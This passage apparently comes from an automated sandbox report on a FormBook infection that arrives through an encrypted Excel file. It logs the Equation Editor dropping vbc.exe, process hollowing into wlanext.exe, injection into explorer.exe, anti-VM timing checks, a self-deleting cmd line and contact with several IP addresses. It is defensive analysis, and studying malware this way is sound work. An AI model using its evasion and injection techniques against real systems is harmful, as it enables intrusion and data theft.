          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_01FEDF7C
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_01FD0F3F
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_01FDEE4C
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_01FF2E2F
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_0205FDDD
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_0009B493
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_00088C4C
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_00088C50
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_0009CD28
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_00082D87
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_00082D90
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_0009CE77
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_00082FB0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_01E367C7
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_01E35062
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_01E31362
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_01E33302
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_01E332FF
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_01E375B2
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_01E30902
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_01E308F9
          Source: Agreement.xlsxOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: String function: 01FBE2A8 appears 38 times
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: String function: 0200373B appears 245 times
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: String function: 02003F92 appears 132 times
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: String function: 0202F970 appears 84 times
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: String function: 01FBDF5C appears 121 times
          Source: C:\Users\Public\vbc.exeCode function: String function: 0098373B appears 245 times
          Source: C:\Users\Public\vbc.exeCode function: String function: 0093E2A8 appears 38 times
          Source: C:\Users\Public\vbc.exeCode function: String function: 0093DF5C appears 121 times
          Source: C:\Users\Public\vbc.exeCode function: String function: 009AF970 appears 84 times
          Source: C:\Users\Public\vbc.exeCode function: String function: 00983F92 appears 132 times
          Source: 00000005.00000002.2203086612.0000000000080000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.2203086612.0000000000080000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.2372400870.0000000000080000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.2372400870.0000000000080000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.2203183179.00000000002C0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.2203183179.00000000002C0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.2372523372.0000000000210000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.2372523372.0000000000210000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.2203219773.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.2203219773.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000002.2157787740.0000000003B59000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.2157787740.0000000003B59000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.2372501174.00000000001E0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.2372501174.00000000001E0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 5.2.vbc.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.2.vbc.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 5.2.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.2.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: explorer.exe, 00000006.00000000.2166477724.0000000003C40000.00000002.00000001.sdmpBinary or memory string: .VBPud<_
          Source: classification engineClassification label: mal100.troj.expl.evad.winXLSX@9/6@7/5
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\~$Agreement.xlsxJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVR195.tmpJump to behavior
          Source: C:\Users\Public\vbc.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
          Source: C:\Users\Public\vbc.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
          Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
          Source: unknownProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
          Source: unknownProcess created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe
          Source: unknownProcess created: C:\Windows\SysWOW64\wlanext.exe C:\Windows\SysWOW64\wlanext.exe
          Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\Public\vbc.exe'
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
          Source: C:\Users\Public\vbc.exeProcess created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe
          Source: C:\Windows\SysWOW64\wlanext.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\Public\vbc.exe'
          Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{C90250F3-4D7D-4991-9B69-A5C5BC1C2AE6}\InProcServer32
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEAutomated click: Agreement
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEAutomated click: Agreement
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEAutomated click: Agreement
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEAutomated click: Agreement
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEAutomated click: Agreement
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEAutomated click: Agreement
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEAutomated click: Agreement
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEAutomated click: Agreement
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEAutomated click: Agreement
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEAutomated click: Agreement
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEAutomated click: Agreement
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEAutomated click: Agreement
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEAutomated click: Agreement
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEAutomated click: Agreement
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEAutomated click: Agreement
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEAutomated click: Agreement
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEAutomated click: Agreement
          Source: Window RecorderWindow detected: More than 3 window changes detected
          Source: C:\Users\Public\vbc.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
          Source: Agreement.xlsxStatic file information: File size 2198016 > 1048576
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
          Source: Binary string: wntdll.pdb source: vbc.exe, wlanext.exe
          Source: Binary string: wlanext.pdb source: vbc.exe, 00000005.00000002.2203256000.0000000000559000.00000004.00000020.sdmp
          Source: Agreement.xlsxInitial sample: OLE indicators vbamacros = False
          Source: Agreement.xlsxInitial sample: OLE indicators encrypted = True

          Data Obfuscation:

          barindex
          Detected unpacking (changes PE section rights)Show sources
          Source: C:\Users\Public\vbc.exeUnpacked PE file: 4.2.vbc.exe.c70000.3.unpack .text:ER;.rsrc:R;.reloc:R; vs Unknown_Section0:ER;Unknown_Section1:R;Unknown_Section2:R;
          Detected unpacking (overwrites its own PE header)Show sources
          Source: C:\Users\Public\vbc.exeUnpacked PE file: 4.2.vbc.exe.c70000.3.unpack
          Source: C:\Users\Public\vbc.exeCode function: 4_2_00C773C7 push edx; ret
          Source: C:\Users\Public\vbc.exeCode function: 4_2_003191EC push eax; retf
          Source: C:\Users\Public\vbc.exeCode function: 4_2_02188996 push es; ret
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0040C8B1 push ss; iretd
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0041B3F2 push eax; ret
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0041B3FB push eax; ret
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0041B3A5 push eax; ret
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0041B45C push eax; ret
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00415CB8 push esi; ret
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0041A5F2 push cs; retf
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00C773C7 push edx; ret
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0093DFA1 push ecx; ret
          Source: C:\Windows\explorer.exeCode function: 6_2_02900560 push esi; iretd
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_01FBDFA1 push ecx; ret
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_0009B3A5 push eax; ret
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_0009B3FB push eax; ret
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_0009B3F2 push eax; ret
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_0009B45C push eax; ret
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_0009A5F2 push cs; retf
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_0008C8B1 push ss; iretd
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_00095CB8 push esi; ret
          Source: initial sampleStatic PE information: section name: .text entropy: 7.15998976324
          Source: initial sampleStatic PE information: section name: .text entropy: 7.15998976324
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\hm2[1].exeJump to dropped file
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file

          Boot Survival:

          barindex
          Drops PE files to the user root directoryShow sources
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\wlanext.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: Agreement.xlsxStream path 'EncryptedPackage' entropy: 7.99988616788 (max. 8.0)

          Malware Analysis System Evasion:

          barindex
          Yara detected AntiVM_3Show sources
          Source: Yara matchFile source: 00000004.00000002.2157316080.000000000239D000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: vbc.exe PID: 2932, type: MEMORY
          Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
          Source: vbc.exe, 00000004.00000002.2157316080.000000000239D000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLL
          Source: vbc.exe, 00000004.00000002.2157316080.000000000239D000.00000004.00000001.sdmpBinary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME
          Tries to detect virtualization through RDTSC time measurementsShow sources
          Source: C:\Users\Public\vbc.exeRDTSC instruction interceptor: First address: 00000000004085E4 second address: 00000000004085EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\Public\vbc.exeRDTSC instruction interceptor: First address: 000000000040896E second address: 0000000000408974 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\wlanext.exeRDTSC instruction interceptor: First address: 00000000000885E4 second address: 00000000000885EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\wlanext.exeRDTSC instruction interceptor: First address: 000000000008896E second address: 0000000000088974 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\Public\vbc.exeCode function: 5_2_004088A0 rdtsc
          Source: C:\Users\Public\vbc.exeThread delayed: delay time: 922337203685477
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2824Thread sleep time: -360000s >= -30000s
          Source: C:\Users\Public\vbc.exe TID: 2956Thread sleep time: -52602s >= -30000s
          Source: C:\Users\Public\vbc.exe TID: 3056Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\SysWOW64\wlanext.exe TID: 592Thread sleep time: -34000s >= -30000s
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\wlanext.exeLast function: Thread delayed
          Source: explorer.exe, 00000006.00000002.2372546599.00000000001F5000.00000004.00000020.sdmpBinary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000006.00000000.2167012385.0000000004234000.00000004.00000001.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&22BE343F&0&000000
          Source: vbc.exe, 00000004.00000002.2157316080.000000000239D000.00000004.00000001.sdmpBinary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
          Source: explorer.exe, 00000006.00000000.2167029791.0000000004263000.00000004.00000001.sdmpBinary or memory string: \\?\ide#cdromnecvmwar_vmware_sata_cd01_______________1.00____#6&373888b8&0&1.0.0#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}ies
          Source: vbc.exe, 00000004.00000002.2157316080.000000000239D000.00000004.00000001.sdmpBinary or memory string: vmware
          Source: explorer.exe, 00000006.00000000.2166960566.00000000041AD000.00000004.00000001.sdmpBinary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0
          Source: vbc.exe, 00000004.00000002.2157316080.000000000239D000.00000004.00000001.sdmpBinary or memory string: VMware SVGA II
          Source: explorer.exe, 00000006.00000002.2372574038.0000000000231000.00000004.00000020.sdmpBinary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0&E}
          Source: vbc.exe, 00000004.00000002.2157316080.000000000239D000.00000004.00000001.sdmpBinary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools
          Source: C:\Users\Public\vbc.exeProcess information queried: ProcessInformation
          Source: C:\Users\Public\vbc.exeProcess queried: DebugPort
          Source: C:\Windows\SysWOW64\wlanext.exeProcess queried: DebugPort
          Source: C:\Users\Public\vbc.exeCode function: 5_2_004088A0 rdtsc
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00409B10 LdrLoadDll,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_009426F8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_01FC26F8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\vbc.exeProcess token adjusted: Debug
          Source: C:\Windows\SysWOW64\wlanext.exeProcess token adjusted: Debug
          Source: C:\Users\Public\vbc.exeMemory allocated: page read and write | page guard

          HIPS / PFW / Operating System Protection Evasion:

          barindex
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeNetwork Connect: 66.152.187.17 80
          Source: C:\Windows\explorer.exeNetwork Connect: 31.220.110.116 80
          Source: C:\Windows\explorer.exeNetwork Connect: 198.185.159.144 80
          Source: C:\Windows\explorer.exeNetwork Connect: 34.102.136.180 80
          Injects a PE file into a foreign processesShow sources
          Source: C:\Users\Public\vbc.exeMemory written: C:\Users\Public\vbc.exe base: 400000 value starts with: 4D5A
          Maps a DLL or memory area into another processShow sources
          Source: C:\Users\Public\vbc.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\Public\vbc.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\Public\vbc.exeSection loaded: unknown target: C:\Windows\SysWOW64\wlanext.exe protection: execute and read and write
          Source: C:\Users\Public\vbc.exeSection loaded: unknown target: C:\Windows\SysWOW64\wlanext.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\wlanext.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\wlanext.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Modifies the context of a thread in another process (thread injection)Show sources
          Source: C:\Users\Public\vbc.exeThread register set: target process: 1388
          Source: C:\Users\Public\vbc.exeThread register set: target process: 1388
          Source: C:\Windows\SysWOW64\wlanext.exeThread register set: target process: 1388
          Queues an APC in another process (thread injection)Show sources
          Source: C:\Users\Public\vbc.exeThread APC queued: target process: C:\Windows\explorer.exe
          Sample uses process hollowing techniqueShow sources
          Source: C:\Users\Public\vbc.exeSection unmapped: C:\Windows\SysWOW64\wlanext.exe base address: 3E0000
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
          Source: C:\Users\Public\vbc.exeProcess created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe
          Source: C:\Windows\SysWOW64\wlanext.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\Public\vbc.exe'
          Source: explorer.exe, 00000006.00000002.2372693453.00000000006F0000.00000002.00000001.sdmp, wlanext.exe, 00000007.00000002.2372639352.00000000008B0000.00000002.00000001.sdmpBinary or memory string: Program Manager
          Source: explorer.exe, 00000006.00000002.2372693453.00000000006F0000.00000002.00000001.sdmp, wlanext.exe, 00000007.00000002.2372639352.00000000008B0000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000006.00000002.2372546599.00000000001F5000.00000004.00000020.sdmpBinary or memory string: Progman
          Source: explorer.exe, 00000006.00000002.2372693453.00000000006F0000.00000002.00000001.sdmp, wlanext.exe, 00000007.00000002.2372639352.00000000008B0000.00000002.00000001.sdmpBinary or memory string: !Progman
          Source: C:\Users\Public\vbc.exeQueries volume information: C:\Users\Public\vbc.exe VolumeInformation
          Source: C:\Users\Public\vbc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

          Stealing of Sensitive Information:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000005.00000002.2203086612.0000000000080000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.2372400870.0000000000080000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.2203183179.00000000002C0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.2372523372.0000000000210000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.2203219773.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.2157787740.0000000003B59000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.2372501174.00000000001E0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 5.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPE

          Remote Access Functionality:

          barindex
          Yara detected FormBookShow sources
